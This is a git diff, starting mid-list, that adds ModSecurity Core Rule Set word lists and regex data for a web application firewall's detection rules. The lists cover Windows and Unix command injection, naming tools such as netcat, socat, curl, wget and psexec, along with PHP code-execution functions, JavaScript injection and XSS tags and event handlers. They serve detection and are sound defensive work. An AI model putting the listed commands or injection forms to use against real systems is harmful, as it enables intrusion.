+icacls +ifmember +inetcpl +ipconfig +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java@ +label@ +logevent +logman +logoff +logtime +lusrmgr +mapisend +mbsacli +md@ +mdsched +measure +mkdir@ +mklink +mmsys +mode@ +more@ +mount@ +mountvol +moveuser +msconfig +msg@ +msiexec +msinfo32 +mstsc +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nbtstat +nc@ +ncat +net@ +netcat +netdom +netsh +netstat +netsvc +nmap +nslookup +ntbackup +ntrights diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt new file mode 100644 index 000000000..cdbdf7d71 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932115.txt @@ -0,0 +1,164 @@ +# Word list for rule 932115 (RCE Windows command injection part 2/2) +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932115.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# +# To prevent some FP for a command, you can require command parameters +# after a command. Only do this if the command regularly causes FP and if +# allowing the bare command (without parameters) is not too dangerous. +# (Note: due to \b following the regexp, a word boundary is also required +# further on, so some letter/number is needed for a match). Example: +# +# diff@ + +odbcad32 +odbcconf +openfiles +path@ +pathping +perfmon +perl +perl5 +perlsh +php +php5 +php7 +ping +pkgmgr +popd +portqry +powercfg +powershell +powershell_ise +print@ +printbrm +prncnfg +prnmngr +prompt +psexec +psfile +psgetsid +psinfo +pskill +pslist +psloggedon +psloglist +pspasswd +psping +psservice +psshutdown +pssuspend +pushd +python +python2 +python3 +python3m +qgrep +qprocess +query@ +qwinsta +rar@ +rasdial +rasphone +rd@ +recdisc +recover +reg@ +regedit +regini +regsvr32 +rekeywiz +ren@ +rename@ +replace@ +reset@ +rm@ +rmdir@ +rmtshare +robocopy +route@ +rstrui +rsync +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +runas +rundll32 +schtasks +sclist +secpol +select +set@ +setlocal +setx@ +sfc +share +shellrunas +shift +shortcut +showgrps +showmbrs +shrpubw +shutdown +sigverif +sleep +slmgr +sort +start@ +subinacl +subst +svn +sysdm +syskey +systeminfo +systempropertiesadvanced +systempropertiesdataexecutionprevention +systempropertieshardware +systempropertiesperformance +takeown +taskkill +tasklist +taskmgr +taskschd +telnet +timeout +tlist +tpminit +tracert +tree +tsdiscon +tsshutdn +type@ +typeperf +unrar +unzip +useraccountcontrolsettings +usrstat +verify +vol@ +waitfor +wevtutil +wget +#disabled for FP: where@ +whoami +windiff +winmsdp +winrm +winrs +winvar +wmic +wmimgmt +wscript +wscui +wuapp +wuauclt +wusa +xcacls +xcopy +zip@ diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data new file mode 100644 index 000000000..a9561c3ee --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932130.data @@ -0,0 +1,5 @@ +\$\(.*\) +\$\{.*\} +<\(.*\) +>\(.*\) +\$\(\(.*\)\) diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data new file mode 100644 index 000000000..05980b6c0 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932140.data @@ -0,0 +1,2 @@ +\bfor(?:/[dflr].*)? %+[^ ]+ in\(.*\)\s?do +\bif(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==)) diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt new file mode 100644 index 000000000..caaa8c4ad --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-932150.txt @@ -0,0 +1,203 @@ +# Word list for rule 932150 (RCE Unix command injection) +# To lower FP, this rule requires whitespace after a command. +# +# To convert to a regexp that can be pasted into the rule: +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Entries starting with ' are used verbatim. +# Everything after # is a comment. +# + +bash +bsdcat +bsdiff +bsdtar +builtin +bzcat +bzdiff +bzegrep +bzfgrep +bzgrep +bzless +bzmore +cc +command +coproc +csh +curl +dash +diff +dmesg +doas +echo +egrep +env +eval +exec +fetch +fgrep +filetest +ftpstats +ftpwho +gcc +GET +grep +gzcat +gzip +head +hup +irb +irb1 +irb18 +irb19 +irb20 +irb21 +irb22 +java +jobs -x +lastcomm +lastlog +lastlogin +lessecho +lessfile +lesspipe +lftp +lftpget +ls +ls-F +lsb_release +lscpu +lsmod +lsof +lspci +lsusb +lwp +lwp-download +lynx +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmore +mailq +mlocate +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nc +nc.openbsd +nc.traditional +ncat +netcat +netkit-ftp +netstat +nohup +nping +nstat +onintr +perl +perl5 +pftp +pgrep +php +php5 +php7 +ping +pkexec +pkill +popd +printenv +ptar +ptardiff +ptargrep +python +python2 +python3 +python3m +rcp +realpath +rename +repeat +replace +rmdir +rmuser +rnano +rsync +ruby +ruby1 +ruby18 +ruby19 +ruby20 +ruby21 +ruby22 +sched +scp +sdiff +sed +sendmail +setenv +setsid +sftp +sh +sh.distrib +socat +source +ssh +strings +sudo +svn +sysctl +tail +tailf +tar +tcping +tcptraceroute +tcsh +telnet +time +timeout +traceroute +traceroute6 +uname +uncompress +unlzma +unrar +unset +unxz +unzip +useradd +userdel +usermod +vigr +vipw +w3m +wget +whoami +xargs +xz +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +zcat +zcmp +zdiff +zegrep +zfgrep +zgrep +zip +zless +zmore +zrun +zsh diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data new file mode 100644 index 000000000..a4df468f4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933131.data @@ -0,0 +1,16 @@ +AUTH_TYPE +HTTP_ACCEPT +HTTP_ACCEPT_CHARSET +HTTP_ACCEPT_ENCODING +HTTP_ACCEPT_LANGUAGE +HTTP_CONNECTION +HTTP_HOST +HTTP_KEEP_ALIVE +HTTP_REFERER +HTTP_USER_AGENT +HTTP_X_FORWARDED_FOR +ORIG_PATH_INFO +PATH_INFO +PATH_TRANSLATED +QUERY_STRING +REQUEST_URI diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data new file mode 100644 index 000000000..ed5190b19 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933160.data @@ -0,0 +1,226 @@ +array_diff_uassoc +array_diff_ukey +array_filter +array_intersect_uassoc +array_intersect_ukey +array_map +array_reduce +array_udiff +array_udiff_assoc +array_udiff_uassoc +array_uintersect +array_uintersect_assoc +array_uintersect_uassoc +assert +assert_options +base64_encode +bson_decode +bson_encode +bzopen +chr +convert_uuencode +create_function +curl_exec +curl_file_create +curl_init +debug_backtrace +error_reporting +escapeshellarg +escapeshellcmd +eval +exec +exif_imagetype +exif_read_data +exif_tagname +exif_thumbnail +file +file_exists +fileatime +filectime +filegroup +fileinode +filemtime +fileperms +finfo_open +fopen +fputs +ftp_connect +ftp_get +ftp_nb_get +ftp_nb_put +ftp_put +function_exists +fwrite +get_cfg_var +get_current_user +get_meta_tags +getcwd +getenv +getimagesize +getlastmod +getmygid +getmyinode +getmypid +getmyuid +glob +gzcompress +gzdeflate +gzencode +gzfile +gzopen +gzread +gzwrite +hash_file +hash_hmac_file +hash_update_file +header_register_callback +hex2bin +highlight_file +html_entity_decode +htmlentities +htmlspecialchars +htmlspecialchars_decode +image2wbmp +imagecreatefromgif +imagecreatefromjpeg +imagecreatefrompng +imagecreatefromwbmp +imagecreatefromxbm +imagecreatefromxpm +imagegd +imagegd2 +imagegif +imagejpeg +imagepng +imagewbmp +imagexbm +ini_get +ini_get_all +ini_set +iptcembed +is_dir +is_executable +is_file +is_readable +is_writable +is_writeable +iterator_apply +json_decode +json_encode +mb_ereg +mb_ereg_match +mb_ereg_replace +mb_ereg_replace_callback +mb_eregi +mb_eregi_replace +mb_parse_str +md5_file +method_exists +mkdir +move_uploaded_file +mysql_query +ob_clean +ob_end_clean +ob_end_flush +ob_flush +ob_get_clean +ob_get_contents +ob_get_flush +ob_start +odbc_connect +odbc_exec +odbc_execute +odbc_result +odbc_result_all +opendir +parse_ini_file +parse_str +passthru +pg_connect +pg_execute +pg_prepare +pg_query +php_strip_whitespace +php_uname +phpinfo +phpversion +popen +posix_getegid +posix_geteuid +posix_getgid +posix_getlogin +posix_getpwnam +posix_kill +posix_mkfifo +posix_mknod +posix_ttyname +preg_match +preg_match_all +preg_replace +preg_replace_callback +preg_replace_callback_array +preg_split +print_r +proc_close +proc_get_status +proc_nice +proc_open +proc_terminate +putenv +rawurldecode +rawurlencode +read_exif_data +readdir +readfile +readgzfile +register_shutdown_function +register_tick_function +rename_function +runkit_constant_add +runkit_constant_redefine +runkit_function_add +runkit_function_copy +runkit_function_redefine +runkit_function_rename +runkit_method_add +runkit_method_copy +runkit_method_redefine +runkit_method_rename +session_set_save_handler +session_start +set_error_handler +set_exception_handler +set_include_path +set_magic_quotes_runtime +setdefaultstub +sha1_file +show_source +simplexml_load_file +simplexml_load_string +socket_connect +socket_create +spl_autoload_register +sqlite_array_query +sqlite_create_aggregate +sqlite_create_function +sqlite_exec +sqlite_open +sqlite_popen +sqlite_query +sqlite_single_query +sqlite_unbuffered_query +stream_context_create +stream_socket_client +stripcslashes +stripslashes +strrev +system +tmpfile +uasort +uksort +unpack +unserialize +urldecode +urlencode +usort +var_dump diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data new file mode 100644 index 000000000..113b9558d --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-933161.data @@ -0,0 +1,202 @@ +abs +acos +acosh +array +arsort +asin +asinh +asort +assert +atan +atan2 +atanh +basename +bindec +ceil +chdir +checkdate +chmod +chop +chown +chroot +closedir +closelog +compact +constant +copy +cos +cosh +count +crypt +current +date +decoct +define +defined +die +dir +dirname +diskfreespace +dl +doubleval +each +easter_date +easter_days +echo +empty +end +ereg +eregi +error_log +exit +exp +explode +extract +fclose +feof +fgets +fileowner +filepro +filesize +filetype +floatval +flock +floor +flush +fmod +fread +fstat +ftell +ftok +function +getdate +gettext +gettype +gmdate +hash +header +headers_list +headers_sent +hebrev +hypot +iconv +idate +implode +include +intdiv +intval +invoke +is_a +is_array +is_bool +is_callable +is_double +is_finite +is_float +is_infinite +is_int +is_integer +is_link +is_long +is_nan +is_null +is_numeric +is_object +is_real +is_resource +is_scalar +is_string +isset +join +key +ksort +lcfirst +levenshtein +link +linkinfo +list +localtime +log +log10 +log1p +lstat +ltrim +mail +main +max +mbereg +mbsplit +metaphone +mhash +microtime +min +msql +mysql +natsort +next +octdec +openlog +ord +pack +pathinfo +pclose +pi +pos +pow +prev +print +printf +quotemeta +rand +range +readline +readlink +recode +rename +require +reset +rewind +round +rsort +rtrim +scandir +serialize +settype +shuffle +similar_text +sin +sinh +sizeof +sleep +sort +soundex +split +spliti +sprintf +sqrt +srand +stat +strcoll +strlen +strspn +substr +symlink +syslog +taint +tan +tanh +tempnam +textdomain +time +touch +trim +ucfirst +umask +uniqid +unlink +unset +untaint +usleep +usort +virtual +wordwrap diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt new file mode 100644 index 000000000..64065bc61 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-934100.txt @@ -0,0 +1,8 @@ +_\$\$ND_FUNC\$\$_ +__js_function +\beval\s*\( +String\s*\.\s*fromCharCode +function\s*\(\s*\)\s*{ +new\s+Function\s*\( +this\.constructor +module\.exports\s*= diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data new file mode 100644 index 000000000..80ea2def4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941130.data @@ -0,0 +1,10 @@ +(?i)[\s\S]xlink:href\b +(?i)[\s\S]xhtml\b +(?i)[\s\S]xmlns\b +(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b +(?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b +(?i)[\s\S]data:text/html\b +(?i)[\s\S]formaction\b +(?i)[\s\S]@import\b +(?i)[\s\S];base64\b +(?i)[\s\S]pattern\b.*?=\b diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data new file mode 100644 index 000000000..18f8d41b3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/regexp-assemble/regexp-941160.data @@ -0,0 +1,308 @@ +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w] +<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?= +(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?= 